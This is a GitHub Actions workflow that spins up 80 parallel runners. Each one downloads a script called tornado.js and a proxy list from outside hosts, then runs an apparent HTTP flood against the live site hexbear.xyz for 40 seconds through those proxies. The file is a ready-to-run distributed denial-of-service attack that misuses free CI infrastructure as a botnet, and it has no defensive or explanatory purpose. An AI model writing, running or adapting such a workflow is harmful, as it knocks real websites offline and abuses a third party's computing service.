name: Ubuntu VDS 20 saniye

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80]

    steps:
      - name: OK !
        run: |
          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js
          wget https://curl.by/g7Z0b/proxies.txt
          npm i hpack
          timeout 40 node tornado.js GET https://hexbear.xyz/ 40 10 90 proxies.txt --full --query 3
          
      - name: OK !
        run: |
          sleep 40
          exit 0
